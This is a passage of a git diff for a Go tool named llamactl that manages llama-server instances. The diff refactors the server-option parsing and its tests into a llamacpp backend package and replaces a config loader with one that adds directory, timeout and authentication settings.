IgnoreEOS bool `json:"ignore_eos,omitempty"` IgnoreEOS bool `json:"ignore_eos,omitempty"`
Temperature float64 `json:"temperature,omitempty"` Temperature float64 `json:"temp,omitempty"`
TopK int `json:"top_k,omitempty"` TopK int `json:"top_k,omitempty"`
TopP float64 `json:"top_p,omitempty"` TopP float64 `json:"top_p,omitempty"`
MinP float64 `json:"min_p,omitempty"` MinP float64 `json:"min_p,omitempty"`
@@ -110,7 +110,7 @@ type LlamaServerOptions struct {
JSONSchema string `json:"json_schema,omitempty"` JSONSchema string `json:"json_schema,omitempty"`
JSONSchemaFile string `json:"json_schema_file,omitempty"` JSONSchemaFile string `json:"json_schema_file,omitempty"`
// Server/Example-specific params // Example-specific params
NoContextShift bool `json:"no_context_shift,omitempty"` NoContextShift bool `json:"no_context_shift,omitempty"`
Special bool `json:"special,omitempty"` Special bool `json:"special,omitempty"`
NoWarmup bool `json:"no_warmup,omitempty"` NoWarmup bool `json:"no_warmup,omitempty"`
@@ -150,17 +150,15 @@ type LlamaServerOptions struct {
NoPrefillAssistant bool `json:"no_prefill_assistant,omitempty"` NoPrefillAssistant bool `json:"no_prefill_assistant,omitempty"`
SlotPromptSimilarity float64 `json:"slot_prompt_similarity,omitempty"` SlotPromptSimilarity float64 `json:"slot_prompt_similarity,omitempty"`
LoraInitWithoutApply bool `json:"lora_init_without_apply,omitempty"` LoraInitWithoutApply bool `json:"lora_init_without_apply,omitempty"`
DraftMax int `json:"draft_max,omitempty"`
// Speculative decoding params DraftMin int `json:"draft_min,omitempty"`
DraftMax int `json:"draft_max,omitempty"` DraftPMin float64 `json:"draft_p_min,omitempty"`
DraftMin int `json:"draft_min,omitempty"` CtxSizeDraft int `json:"ctx_size_draft,omitempty"`
DraftPMin float64 `json:"draft_p_min,omitempty"` DeviceDraft string `json:"device_draft,omitempty"`
CtxSizeDraft int `json:"ctx_size_draft,omitempty"` GPULayersDraft int `json:"gpu_layers_draft,omitempty"`
DeviceDraft string `json:"device_draft,omitempty"` ModelDraft string `json:"model_draft,omitempty"`
GPULayersDraft int `json:"gpu_layers_draft,omitempty"` CacheTypeKDraft string `json:"cache_type_k_draft,omitempty"`
ModelDraft string `json:"model_draft,omitempty"` CacheTypeVDraft string `json:"cache_type_v_draft,omitempty"`
CacheTypeKDraft string `json:"cache_type_k_draft,omitempty"`
CacheTypeVDraft string `json:"cache_type_v_draft,omitempty"`
// Audio/TTS params // Audio/TTS params
ModelVocoder string `json:"model_vocoder,omitempty"` ModelVocoder string `json:"model_vocoder,omitempty"`
@@ -199,62 +197,75 @@ func (o *LlamaServerOptions) UnmarshalJSON(data []byte) error {
// Handle alternative field names // Handle alternative field names
fieldMappings := map[string]string{ fieldMappings := map[string]string{
// Official llama-server short forms from the documentation // Common params
"t": "threads", // -t, --threads N "t": "threads", // -t, --threads N
"tb": "threads_batch", // -tb, --threads-batch N "tb": "threads_batch", // -tb, --threads-batch N
"C": "cpu_mask", // -C, --cpu-mask M "C": "cpu_mask", // -C, --cpu-mask M
"Cr": "cpu_range", // -Cr, --cpu-range lo-hi "Cr": "cpu_range", // -Cr, --cpu-range lo-hi
"Cb": "cpu_mask_batch", // -Cb, --cpu-mask-batch M "Cb": "cpu_mask_batch", // -Cb, --cpu-mask-batch M
"Crb": "cpu_range_batch", // -Crb, --cpu-range-batch lo-hi "Crb": "cpu_range_batch", // -Crb, --cpu-range-batch lo-hi
"c": "ctx_size", // -c, --ctx-size N "c": "ctx_size", // -c, --ctx-size N
"n": "predict", // -n, --predict, --n-predict N "n": "predict", // -n, --predict N
"b": "batch_size", // -b, --batch-size N "n-predict": "predict", // --n-predict N
"ub": "ubatch_size", // -ub, --ubatch-size N "b": "batch_size", // -b, --batch-size N
"fa": "flash_attn", // -fa, --flash-attn "ub": "ubatch_size", // -ub, --ubatch-size N
"e": "escape", // -e, --escape "fa": "flash_attn", // -fa, --flash-attn
"dkvc": "dump_kv_cache", // -dkvc, --dump-kv-cache "e": "escape", // -e, --escape
"nkvo": "no_kv_offload", // -nkvo, --no-kv-offload "dkvc": "dump_kv_cache", // -dkvc, --dump-kv-cache
"ctk": "cache_type_k", // -ctk, --cache-type-k TYPE "nkvo": "no_kv_offload", // -nkvo, --no-kv-offload
"ctv": "cache_type_v", // -ctv, --cache-type-v TYPE "ctk": "cache_type_k", // -ctk, --cache-type-k TYPE
"dt": "defrag_thold", // -dt, --defrag-thold N "ctv": "cache_type_v", // -ctv, --cache-type-v TYPE
"np": "parallel", // -np, --parallel N "dt": "defrag_thold", // -dt, --defrag-thold N
"dev": "device", // -dev, --device <dev1,dev2,..> "np": "parallel", // -np, --parallel N
"ot": "override_tensor", // --override-tensor, -ot "dev": "device", // -dev, --device <dev1,dev2,..>
"ngl": "gpu_layers", // -ngl, --gpu-layers, --n-gpu-layers N "ot": "override_tensor", // --override-tensor, -ot
"sm": "split_mode", // -sm, --split-mode "ngl": "gpu_layers", // -ngl, --gpu-layers, --n-gpu-layers N
"ts": "tensor_split", // -ts, --tensor-split N0,N1,N2,... "n-gpu-layers": "gpu_layers", // --n-gpu-layers N
"mg": "main_gpu", // -mg, --main-gpu INDEX "sm": "split_mode", // -sm, --split-mode
"m": "model", // -m, --model FNAME "ts": "tensor_split", // -ts, --tensor-split N0,N1,N2,...
"mu": "model_url", // -mu, --model-url MODEL_URL "mg": "main_gpu", // -mg, --main-gpu INDEX
"hf": "hf_repo", // -hf, -hfr, --hf-repo "m": "model", // -m, --model FNAME
"hfr": "hf_repo", // -hf, -hfr, --hf-repo "mu": "model_url", // -mu, --model-url MODEL_URL
"hfd": "hf_repo_draft", // -hfd, -hfrd, --hf-repo-draft "hf": "hf_repo", // -hf, -hfr, --hf-repo
"hfrd": "hf_repo_draft", // -hfd, -hfrd, --hf-repo-draft "hfr": "hf_repo", // -hf, -hfr, --hf-repo
"hff": "hf_file", // -hff, --hf-file FILE "hfd": "hf_repo_draft", // -hfd, -hfrd, --hf-repo-draft
"hfv": "hf_repo_v", // -hfv, -hfrv, --hf-repo-v "hfrd": "hf_repo_draft", // -hfd, -hfrd, --hf-repo-draft
"hfrv": "hf_repo_v", // -hfv, -hfrv, --hf-repo-v "hff": "hf_file", // -hff, --hf-file FILE
"hffv": "hf_file_v", // -hffv, --hf-file-v FILE "hfv": "hf_repo_v", // -hfv, -hfrv, --hf-repo-v
"hft": "hf_token", // -hft, --hf-token TOKEN "hfrv": "hf_repo_v", // -hfv, -hfrv, --hf-repo-v
"v": "verbose", // -v, --verbose, --log-verbose "hffv": "hf_file_v", // -hffv, --hf-file-v FILE
"lv": "verbosity", // -lv, --verbosity, --log-verbosity N "hft": "hf_token", // -hft, --hf-token TOKEN
"s": "seed", // -s, --seed SEED "v": "verbose", // -v, --verbose, --log-verbose
"temp": "temperature", // --temp N "log-verbose": "verbose", // --log-verbose
"l": "logit_bias", // -l, --logit-bias "lv": "verbosity", // -lv, --verbosity, --log-verbosity N
"j": "json_schema", // -j, --json-schema SCHEMA "log-verbosity": "verbosity", // --log-verbosity N
"jf": "json_schema_file", // -jf, --json-schema-file FILE
"sp": "special", // -sp, --special // Sampling params
"cb": "cont_batching", // -cb, --cont-batching "s": "seed", // -s, --seed SEED
"nocb": "no_cont_batching", // -nocb, --no-cont-batching "l": "logit_bias", // -l, --logit-bias
"a": "alias", // -a, --alias STRING "j": "json_schema", // -j, --json-schema SCHEMA
"to": "timeout", // -to, --timeout N "jf": "json_schema_file", // -jf, --json-schema-file FILE
"sps": "slot_prompt_similarity", // -sps, --slot-prompt-similarity
"cd": "ctx_size_draft", // -cd, --ctx-size-draft N // Example-specific params
"devd": "device_draft", // -devd, --device-draft "sp": "special", // -sp, --special
"ngld": "gpu_layers_draft", // -ngld, --gpu-layers-draft "cb": "cont_batching", // -cb, --cont-batching
"md": "model_draft", // -md, --model-draft FNAME "nocb": "no_cont_batching", // -nocb, --no-cont-batching
"ctkd": "cache_type_k_draft", // -ctkd, --cache-type-k-draft TYPE "a": "alias", // -a, --alias STRING
"ctvd": "cache_type_v_draft", // -ctvd, --cache-type-v-draft TYPE "embeddings": "embedding", // --embeddings
"mv": "model_vocoder", // -mv, --model-vocoder FNAME "rerank": "reranking", // --reranking
"to": "timeout", // -to, --timeout N
"sps": "slot_prompt_similarity", // -sps, --slot-prompt-similarity
"draft": "draft-max", // -draft, --draft-max N
"draft-n": "draft-max", // --draft-n-max N
"draft-n-min": "draft_min", // --draft-n-min N
"cd": "ctx_size_draft", // -cd, --ctx-size-draft N
"devd": "device_draft", // -devd, --device-draft
"ngld": "gpu_layers_draft", // -ngld, --gpu-layers-draft
"n-gpu-layers-draft": "gpu_layers_draft", // --n-gpu-layers-draft N
"md": "model_draft", // -md, --model-draft FNAME
"ctkd": "cache_type_k_draft", // -ctkd, --cache-type-k-draft TYPE
"ctvd": "cache_type_v_draft", // -ctvd, --cache-type-v-draft TYPE
"mv": "model_vocoder", // -mv, --model-vocoder FNAME
} }
// Process alternative field names // Process alternative field names

View File

@@ -1,17 +1,16 @@
package llamactl_test package llamacpp_test
import ( import (
"encoding/json" "encoding/json"
"fmt" "fmt"
"llamactl/pkg/backends/llamacpp"
"reflect" "reflect"
"slices" "slices"
"testing" "testing"
llamactl "llamactl/pkg"
) )
func TestBuildCommandArgs_BasicFields(t *testing.T) { func TestBuildCommandArgs_BasicFields(t *testing.T) {
options := llamactl.LlamaServerOptions{ options := llamacpp.LlamaServerOptions{
Model: "/path/to/model.gguf", Model: "/path/to/model.gguf",
Port: 8080, Port: 8080,
Host: "localhost", Host: "localhost",
@@ -46,27 +45,27 @@ func TestBuildCommandArgs_BasicFields(t *testing.T) {
func TestBuildCommandArgs_BooleanFields(t *testing.T) { func TestBuildCommandArgs_BooleanFields(t *testing.T) {
tests := []struct { tests := []struct {
name string name string
options llamactl.LlamaServerOptions options llamacpp.LlamaServerOptions
expected []string expected []string
excluded []string excluded []string
}{ }{
{ {
name: "verbose true", name: "verbose true",
options: llamactl.LlamaServerOptions{ options: llamacpp.LlamaServerOptions{
Verbose: true, Verbose: true,
}, },
expected: []string{"--verbose"}, expected: []string{"--verbose"},
}, },
{ {
name: "verbose false", name: "verbose false",
options: llamactl.LlamaServerOptions{ options: llamacpp.LlamaServerOptions{
Verbose: false, Verbose: false,
}, },
excluded: []string{"--verbose"}, excluded: []string{"--verbose"},
}, },
{ {
name: "multiple booleans", name: "multiple booleans",
options: llamactl.LlamaServerOptions{ options: llamacpp.LlamaServerOptions{
Verbose: true, Verbose: true,
FlashAttn: true, FlashAttn: true,
Mlock: false, Mlock: false,
@@ -97,7 +96,7 @@ func TestBuildCommandArgs_BooleanFields(t *testing.T) {
} }
func TestBuildCommandArgs_NumericFields(t *testing.T) { func TestBuildCommandArgs_NumericFields(t *testing.T) {
options := llamactl.LlamaServerOptions{ options := llamacpp.LlamaServerOptions{
Port: 8080, Port: 8080,
Threads: 4, Threads: 4,
CtxSize: 2048, CtxSize: 2048,
@@ -110,13 +109,13 @@ func TestBuildCommandArgs_NumericFields(t *testing.T) {
args := options.BuildCommandArgs() args := options.BuildCommandArgs()
expectedPairs := map[string]string{ expectedPairs := map[string]string{
"--port": "8080", "--port": "8080",
"--threads": "4", "--threads": "4",
"--ctx-size": "2048", "--ctx-size": "2048",
"--gpu-layers": "16", "--gpu-layers": "16",
"--temperature": "0.7", "--temp": "0.7",
"--top-k": "40", "--top-k": "40",
"--top-p": "0.9", "--top-p": "0.9",
} }
for flag, expectedValue := range expectedPairs { for flag, expectedValue := range expectedPairs {
@@ -127,7 +126,7 @@ func TestBuildCommandArgs_NumericFields(t *testing.T) {
} }
func TestBuildCommandArgs_ZeroValues(t *testing.T) { func TestBuildCommandArgs_ZeroValues(t *testing.T) {
options := llamactl.LlamaServerOptions{ options := llamacpp.LlamaServerOptions{
Port: 0, // Should be excluded Port: 0, // Should be excluded
Threads: 0, // Should be excluded Threads: 0, // Should be excluded
Temperature: 0, // Should be excluded Temperature: 0, // Should be excluded
@@ -154,7 +153,7 @@ func TestBuildCommandArgs_ZeroValues(t *testing.T) {
} }
func TestBuildCommandArgs_ArrayFields(t *testing.T) { func TestBuildCommandArgs_ArrayFields(t *testing.T) {
options := llamactl.LlamaServerOptions{ options := llamacpp.LlamaServerOptions{
Lora: []string{"adapter1.bin", "adapter2.bin"}, Lora: []string{"adapter1.bin", "adapter2.bin"},
OverrideTensor: []string{"tensor1", "tensor2", "tensor3"}, OverrideTensor: []string{"tensor1", "tensor2", "tensor3"},
DrySequenceBreaker: []string{".", "!", "?"}, DrySequenceBreaker: []string{".", "!", "?"},
@@ -179,7 +178,7 @@ func TestBuildCommandArgs_ArrayFields(t *testing.T) {
} }
func TestBuildCommandArgs_EmptyArrays(t *testing.T) { func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
options := llamactl.LlamaServerOptions{ options := llamacpp.LlamaServerOptions{
Lora: []string{}, // Empty array should not generate args Lora: []string{}, // Empty array should not generate args
OverrideTensor: []string{}, // Empty array should not generate args OverrideTensor: []string{}, // Empty array should not generate args
} }
@@ -196,7 +195,7 @@ func TestBuildCommandArgs_EmptyArrays(t *testing.T) {
func TestBuildCommandArgs_FieldNameConversion(t *testing.T) { func TestBuildCommandArgs_FieldNameConversion(t *testing.T) {
// Test snake_case to kebab-case conversion // Test snake_case to kebab-case conversion
options := llamactl.LlamaServerOptions{ options := llamacpp.LlamaServerOptions{
CtxSize: 4096, CtxSize: 4096,
GPULayers: 32, GPULayers: 32,
ThreadsBatch: 2, ThreadsBatch: 2,
@@ -232,10 +231,10 @@ func TestUnmarshalJSON_StandardFields(t *testing.T) {
"verbose": true, "verbose": true,
"ctx_size": 4096, "ctx_size": 4096,
"gpu_layers": 32, "gpu_layers": 32,
"temperature": 0.7 "temp": 0.7
}` }`
var options llamactl.LlamaServerOptions var options llamacpp.LlamaServerOptions
err := json.Unmarshal([]byte(jsonData), &options) err := json.Unmarshal([]byte(jsonData), &options)
if err != nil { if err != nil {
t.Fatalf("Unmarshal failed: %v", err) t.Fatalf("Unmarshal failed: %v", err)
@@ -268,12 +267,12 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
tests := []struct { tests := []struct {
name string name string
jsonData string jsonData string
checkFn func(llamactl.LlamaServerOptions) error checkFn func(llamacpp.LlamaServerOptions) error
}{ }{
{ {
name: "threads alternatives", name: "threads alternatives",
jsonData: `{"t": 4, "tb": 2}`, jsonData: `{"t": 4, "tb": 2}`,
checkFn: func(opts llamactl.LlamaServerOptions) error { checkFn: func(opts llamacpp.LlamaServerOptions) error {
if opts.Threads != 4 { if opts.Threads != 4 {
return fmt.Errorf("expected threads 4, got %d", opts.Threads) return fmt.Errorf("expected threads 4, got %d", opts.Threads)
} }
@@ -286,7 +285,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
{ {
name: "context size alternatives", name: "context size alternatives",
jsonData: `{"c": 2048}`, jsonData: `{"c": 2048}`,
checkFn: func(opts llamactl.LlamaServerOptions) error { checkFn: func(opts llamacpp.LlamaServerOptions) error {
if opts.CtxSize != 2048 { if opts.CtxSize != 2048 {
return fmt.Errorf("expected ctx_size 4096, got %d", opts.CtxSize) return fmt.Errorf("expected ctx_size 4096, got %d", opts.CtxSize)
} }
@@ -296,7 +295,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
{ {
name: "gpu layers alternatives", name: "gpu layers alternatives",
jsonData: `{"ngl": 16}`, jsonData: `{"ngl": 16}`,
checkFn: func(opts llamactl.LlamaServerOptions) error { checkFn: func(opts llamacpp.LlamaServerOptions) error {
if opts.GPULayers != 16 { if opts.GPULayers != 16 {
return fmt.Errorf("expected gpu_layers 32, got %d", opts.GPULayers) return fmt.Errorf("expected gpu_layers 32, got %d", opts.GPULayers)
} }
@@ -306,7 +305,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
{ {
name: "model alternatives", name: "model alternatives",
jsonData: `{"m": "/path/model.gguf"}`, jsonData: `{"m": "/path/model.gguf"}`,
checkFn: func(opts llamactl.LlamaServerOptions) error { checkFn: func(opts llamacpp.LlamaServerOptions) error {
if opts.Model != "/path/model.gguf" { if opts.Model != "/path/model.gguf" {
return fmt.Errorf("expected model '/path/model.gguf', got %q", opts.Model) return fmt.Errorf("expected model '/path/model.gguf', got %q", opts.Model)
} }
@@ -316,7 +315,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
{ {
name: "temperature alternatives", name: "temperature alternatives",
jsonData: `{"temp": 0.8}`, jsonData: `{"temp": 0.8}`,
checkFn: func(opts llamactl.LlamaServerOptions) error { checkFn: func(opts llamacpp.LlamaServerOptions) error {
if opts.Temperature != 0.8 { if opts.Temperature != 0.8 {
return fmt.Errorf("expected temperature 0.8, got %f", opts.Temperature) return fmt.Errorf("expected temperature 0.8, got %f", opts.Temperature)
} }
@@ -327,7 +326,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
for _, tt := range tests { for _, tt := range tests {
t.Run(tt.name, func(t *testing.T) { t.Run(tt.name, func(t *testing.T) {
var options llamactl.LlamaServerOptions var options llamacpp.LlamaServerOptions
err := json.Unmarshal([]byte(tt.jsonData), &options) err := json.Unmarshal([]byte(tt.jsonData), &options)
if err != nil { if err != nil {
t.Fatalf("Unmarshal failed: %v", err) t.Fatalf("Unmarshal failed: %v", err)
@@ -343,7 +342,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
func TestUnmarshalJSON_InvalidJSON(t *testing.T) { func TestUnmarshalJSON_InvalidJSON(t *testing.T) {
invalidJSON := `{"port": "not-a-number", "invalid": syntax}` invalidJSON := `{"port": "not-a-number", "invalid": syntax}`
var options llamactl.LlamaServerOptions var options llamacpp.LlamaServerOptions
err := json.Unmarshal([]byte(invalidJSON), &options) err := json.Unmarshal([]byte(invalidJSON), &options)
if err == nil { if err == nil {
t.Error("Expected error for invalid JSON") t.Error("Expected error for invalid JSON")
@@ -357,7 +356,7 @@ func TestUnmarshalJSON_ArrayFields(t *testing.T) {
"dry_sequence_breaker": [".", "!", "?"] "dry_sequence_breaker": [".", "!", "?"]
}` }`
var options llamactl.LlamaServerOptions var options llamacpp.LlamaServerOptions
err := json.Unmarshal([]byte(jsonData), &options) err := json.Unmarshal([]byte(jsonData), &options)
if err != nil { if err != nil {
t.Fatalf("Unmarshal failed: %v", err) t.Fatalf("Unmarshal failed: %v", err)

View File

@@ -1,243 +0,0 @@
package llamactl
import (
"os"
"path/filepath"
"runtime"
"strconv"
"strings"
"gopkg.in/yaml.v3"
)
// Config represents the configuration for llamactl
type Config struct {
Server ServerConfig `yaml:"server"`
Instances InstancesConfig `yaml:"instances"`
}
// ServerConfig contains HTTP server configuration
type ServerConfig struct {
// Server host to bind to
Host string `yaml:"host"`
// Server port to bind to
Port int `yaml:"port"`
// Allowed origins for CORS (e.g., "http://localhost:3000")
AllowedOrigins []string `yaml:"allowed_origins"`
}
// InstancesConfig contains instance management configuration
type InstancesConfig struct {
// Port range for instances (e.g., 8000,9000)
PortRange [2]int `yaml:"port_range"`
// Directory where instance logs will be stored
LogDirectory string `yaml:"log_directory"`
// Maximum number of instances that can be created
MaxInstances int `yaml:"max_instances"`
// Path to llama-server executable
LlamaExecutable string `yaml:"llama_executable"`
// Default auto-restart setting for new instances
DefaultAutoRestart bool `yaml:"default_auto_restart"`
// Default max restarts for new instances
DefaultMaxRestarts int `yaml:"default_max_restarts"`
// Default restart delay for new instances (in seconds)
DefaultRestartDelay int `yaml:"default_restart_delay"`
}
// LoadConfig loads configuration with the following precedence:
// 1. Hardcoded defaults
// 2. Config file
// 3. Environment variables
func LoadConfig(configPath string) (Config, error) {
// 1. Start with defaults
cfg := Config{
Server: ServerConfig{
Host: "0.0.0.0",
Port: 8080,
AllowedOrigins: []string{"*"}, // Default to allow all origins
},
Instances: InstancesConfig{
PortRange: [2]int{8000, 9000},
LogDirectory: "/tmp/llamactl",
MaxInstances: -1, // -1 means unlimited
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
},
}
// 2. Load from config file
if err := loadConfigFile(&cfg, configPath); err != nil {
return cfg, err
}
// 3. Override with environment variables
loadEnvVars(&cfg)
return cfg, nil
}
// loadConfigFile attempts to load config from file with fallback locations
func loadConfigFile(cfg *Config, configPath string) error {
var configLocations []string
// If specific config path provided, use only that
if configPath != "" {
configLocations = []string{configPath}
} else {
// Default config file locations (in order of precedence)
configLocations = getDefaultConfigLocations()
}
for _, path := range configLocations {
if data, err := os.ReadFile(path); err == nil {
if err := yaml.Unmarshal(data, cfg); err != nil {
return err
}
return nil
}
}
return nil
}
// loadEnvVars overrides config with environment variables
func loadEnvVars(cfg *Config) {
// Server config
if host := os.Getenv("LLAMACTL_HOST"); host != "" {
cfg.Server.Host = host
}
if port := os.Getenv("LLAMACTL_PORT"); port != "" {
if p, err := strconv.Atoi(port); err == nil {
cfg.Server.Port = p
}
}
// Instance config
if portRange := os.Getenv("LLAMACTL_INSTANCE_PORT_RANGE"); portRange != "" {
if ports := ParsePortRange(portRange); ports != [2]int{0, 0} {
cfg.Instances.PortRange = ports
}
}
if logDir := os.Getenv("LLAMACTL_LOG_DIR"); logDir != "" {
cfg.Instances.LogDirectory = logDir
}
if maxInstances := os.Getenv("LLAMACTL_MAX_INSTANCES"); maxInstances != "" {
if m, err := strconv.Atoi(maxInstances); err == nil {
cfg.Instances.MaxInstances = m
}
}
if llamaExec := os.Getenv("LLAMACTL_LLAMA_EXECUTABLE"); llamaExec != "" {
cfg.Instances.LlamaExecutable = llamaExec
}
if autoRestart := os.Getenv("LLAMACTL_DEFAULT_AUTO_RESTART"); autoRestart != "" {
if b, err := strconv.ParseBool(autoRestart); err == nil {
cfg.Instances.DefaultAutoRestart = b
}
}
if maxRestarts := os.Getenv("LLAMACTL_DEFAULT_MAX_RESTARTS"); maxRestarts != "" {
if m, err := strconv.Atoi(maxRestarts); err == nil {
cfg.Instances.DefaultMaxRestarts = m
}
}
if restartDelay := os.Getenv("LLAMACTL_DEFAULT_RESTART_DELAY"); restartDelay != "" {
if seconds, err := strconv.Atoi(restartDelay); err == nil {
cfg.Instances.DefaultRestartDelay = seconds
}
}
}
// ParsePortRange parses port range from string formats like "8000-9000" or "8000,9000"
func ParsePortRange(s string) [2]int {
var parts []string
// Try both separators
if strings.Contains(s, "-") {
parts = strings.Split(s, "-")
} else if strings.Contains(s, ",") {
parts = strings.Split(s, ",")
}
// Parse the two parts
if len(parts) == 2 {
start, err1 := strconv.Atoi(strings.TrimSpace(parts[0]))
end, err2 := strconv.Atoi(strings.TrimSpace(parts[1]))
if err1 == nil && err2 == nil {
return [2]int{start, end}
}
}
return [2]int{0, 0} // Invalid format
}
// getDefaultConfigLocations returns platform-specific config file locations
func getDefaultConfigLocations() []string {
var locations []string
// Current directory (cross-platform)
locations = append(locations,
"./llamactl.yaml",
"./config.yaml",
)
homeDir, _ := os.UserHomeDir()
switch runtime.GOOS {
case "windows":
// Windows: Use APPDATA and ProgramData
if appData := os.Getenv("APPDATA"); appData != "" {
locations = append(locations, filepath.Join(appData, "llamactl", "config.yaml"))
}
if programData := os.Getenv("PROGRAMDATA"); programData != "" {
locations = append(locations, filepath.Join(programData, "llamactl", "config.yaml"))
}
// Fallback to user home
if homeDir != "" {
locations = append(locations, filepath.Join(homeDir, "llamactl", "config.yaml"))
}
case "darwin":
// macOS: Use proper Application Support directories
if homeDir != "" {
locations = append(locations,
filepath.Join(homeDir, "Library", "Application Support", "llamactl", "config.yaml"),
filepath.Join(homeDir, ".config", "llamactl", "config.yaml"), // XDG fallback
)
}
locations = append(locations, "/Library/Application Support/llamactl/config.yaml")
locations = append(locations, "/etc/llamactl/config.yaml") // Unix fallback
default:
// User config: $XDG_CONFIG_HOME/llamactl/config.yaml or ~/.config/llamactl/config.yaml
configHome := os.Getenv("XDG_CONFIG_HOME")
if configHome == "" && homeDir != "" {
configHome = filepath.Join(homeDir, ".config")
}
if configHome != "" {
locations = append(locations, filepath.Join(configHome, "llamactl", "config.yaml"))
}
// System config: /etc/llamactl/config.yaml
locations = append(locations, "/etc/llamactl/config.yaml")
// Additional system locations
if xdgConfigDirs := os.Getenv("XDG_CONFIG_DIRS"); xdgConfigDirs != "" {
for dir := range strings.SplitSeq(xdgConfigDirs, ":") {
if dir != "" {
locations = append(locations, filepath.Join(dir, "llamactl", "config.yaml"))
}
}
}
}
return locations
}

367
pkg/config/config.go Normal file
View File

@@ -0,0 +1,367 @@
package config
import (
"os"
"path/filepath"
"runtime"
"strconv"
"strings"
"gopkg.in/yaml.v3"
)
// AppConfig represents the configuration for llamactl
type AppConfig struct {
Server ServerConfig `yaml:"server"`
Instances InstancesConfig `yaml:"instances"`
Auth AuthConfig `yaml:"auth"`
Version string `yaml:"-"`
CommitHash string `yaml:"-"`
BuildTime string `yaml:"-"`
}
// ServerConfig contains HTTP server configuration
type ServerConfig struct {
// Server host to bind to
Host string `yaml:"host"`
// Server port to bind to
Port int `yaml:"port"`
// Allowed origins for CORS (e.g., "http://localhost:3000")
AllowedOrigins []string `yaml:"allowed_origins"`
// Enable Swagger UI for API documentation
EnableSwagger bool `yaml:"enable_swagger"`
}
// InstancesConfig contains instance management configuration
type InstancesConfig struct {
// Port range for instances (e.g., 8000,9000)
PortRange [2]int `yaml:"port_range"`
// Directory where all llamactl data will be stored (instances.json, logs, etc.)
DataDir string `yaml:"data_dir"`
// Instance config directory override
InstancesDir string `yaml:"configs_dir"`
// Logs directory override
LogsDir string `yaml:"logs_dir"`
// Automatically create the data directory if it doesn't exist
AutoCreateDirs bool `yaml:"auto_create_dirs"`
// Maximum number of instances that can be created
MaxInstances int `yaml:"max_instances"`
// Maximum number of instances that can be running at the same time
MaxRunningInstances int `yaml:"max_running_instances,omitempty"`
// Enable LRU eviction for instance logs
EnableLRUEviction bool `yaml:"enable_lru_eviction"`
// Path to llama-server executable
LlamaExecutable string `yaml:"llama_executable"`
// Default auto-restart setting for new instances
DefaultAutoRestart bool `yaml:"default_auto_restart"`
// Default max restarts for new instances
DefaultMaxRestarts int `yaml:"default_max_restarts"`
// Default restart delay for new instances (in seconds)
DefaultRestartDelay int `yaml:"default_restart_delay"`
// Default on-demand start setting for new instances
DefaultOnDemandStart bool `yaml:"default_on_demand_start"`
// How long to wait for an instance to start on demand (in seconds)
OnDemandStartTimeout int `yaml:"on_demand_start_timeout,omitempty"`
// Interval for checking instance timeouts (in minutes)
TimeoutCheckInterval int `yaml:"timeout_check_interval"`
}
// AuthConfig contains authentication settings
type AuthConfig struct {
// Require authentication for OpenAI compatible inference endpoints
RequireInferenceAuth bool `yaml:"require_inference_auth"`
// List of keys for OpenAI compatible inference endpoints
InferenceKeys []string `yaml:"inference_keys"`
// Require authentication for management endpoints
RequireManagementAuth bool `yaml:"require_management_auth"`
// List of keys for management endpoints
ManagementKeys []string `yaml:"management_keys"`
}
// LoadConfig loads configuration with the following precedence:
// 1. Hardcoded defaults
// 2. Config file
// 3. Environment variables
func LoadConfig(configPath string) (AppConfig, error) {
// 1. Start with defaults
cfg := AppConfig{
Server: ServerConfig{
Host: "0.0.0.0",
Port: 8080,
AllowedOrigins: []string{"*"}, // Default to allow all origins
EnableSwagger: false,
},
Instances: InstancesConfig{
PortRange: [2]int{8000, 9000},
DataDir: getDefaultDataDirectory(),
InstancesDir: filepath.Join(getDefaultDataDirectory(), "instances"),
LogsDir: filepath.Join(getDefaultDataDirectory(), "logs"),
AutoCreateDirs: true,
MaxInstances: -1, // -1 means unlimited
MaxRunningInstances: -1, // -1 means unlimited
EnableLRUEviction: true,
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
DefaultOnDemandStart: true,
OnDemandStartTimeout: 120, // 2 minutes
TimeoutCheckInterval: 5, // Check timeouts every 5 minutes
},
Auth: AuthConfig{
RequireInferenceAuth: true,
InferenceKeys: []string{},
RequireManagementAuth: true,
ManagementKeys: []string{},
},
}
// 2. Load from config file
if err := loadConfigFile(&cfg, configPath); err != nil {
return cfg, err
}
// 3. Override with environment variables
loadEnvVars(&cfg)
return cfg, nil
}
// loadConfigFile attempts to load config from file with fallback locations
func loadConfigFile(cfg *AppConfig, configPath string) error {
var configLocations []string
// If specific config path provided, use only that
if configPath != "" {
configLocations = []string{configPath}
} else {
// Default config file locations (in order of precedence)
configLocations = getDefaultConfigLocations()
}
for _, path := range configLocations {
if data, err := os.ReadFile(path); err == nil {
if err := yaml.Unmarshal(data, cfg); err != nil {
return err
}
return nil
}
}
return nil
}
// loadEnvVars overrides config with environment variables
func loadEnvVars(cfg *AppConfig) {
// Server config
if host := os.Getenv("LLAMACTL_HOST"); host != "" {
cfg.Server.Host = host
}
if port := os.Getenv("LLAMACTL_PORT"); port != "" {
if p, err := strconv.Atoi(port); err == nil {
cfg.Server.Port = p
}
}
if allowedOrigins := os.Getenv("LLAMACTL_ALLOWED_ORIGINS"); allowedOrigins != "" {
cfg.Server.AllowedOrigins = strings.Split(allowedOrigins, ",")
}
if enableSwagger := os.Getenv("LLAMACTL_ENABLE_SWAGGER"); enableSwagger != "" {
if b, err := strconv.ParseBool(enableSwagger); err == nil {
cfg.Server.EnableSwagger = b
}
}
// Data config
if dataDir := os.Getenv("LLAMACTL_DATA_DIRECTORY"); dataDir != "" {
cfg.Instances.DataDir = dataDir
}
if instancesDir := os.Getenv("LLAMACTL_INSTANCES_DIR"); instancesDir != "" {
cfg.Instances.InstancesDir = instancesDir
}
if logsDir := os.Getenv("LLAMACTL_LOGS_DIR"); logsDir != "" {
cfg.Instances.LogsDir = logsDir
}
